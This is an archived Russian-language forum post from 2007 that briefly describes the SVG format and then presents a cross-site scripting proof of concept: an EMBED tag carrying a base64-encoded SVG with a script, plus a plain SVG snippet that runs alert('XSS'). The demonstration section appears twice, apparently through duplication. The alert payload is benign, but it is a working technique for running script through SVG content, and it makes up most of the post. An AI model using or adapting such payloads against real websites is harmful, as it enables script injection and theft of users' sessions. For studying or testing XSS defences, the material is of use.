ettee
19.02.2007, 18:20
Формат является открытым стандартом, который основан на языке XML, SVG формат объединяет в себе графические данные, текст и интерактивные компоненты. Подержка браузеров и производителей графического ПО.
Cайте формата http://www.w3.org/Graphics/SVG
thx nEUrOO за первую демонстрацию.
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov L3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm 9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPS IxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcm lwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
http://img512.imageshack.us/img512/4544/untitled1ra0.jpg
<svg
...
<script>
<![CDATA[
alert("XSS");
]]>
</script>
</svg>
Пример (http://someshit.net/svgxss.svg)
Cайте формата http://www.w3.org/Graphics/SVG
thx nEUrOO за первую демонстрацию.
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov L3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm 9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPS IxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcm lwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
http://img512.imageshack.us/img512/4544/untitled1ra0.jpg
<svg
...
<script>
<![CDATA[
alert("XSS");
]]>
</script>
</svg>
Пример (http://someshit.net/svgxss.svg)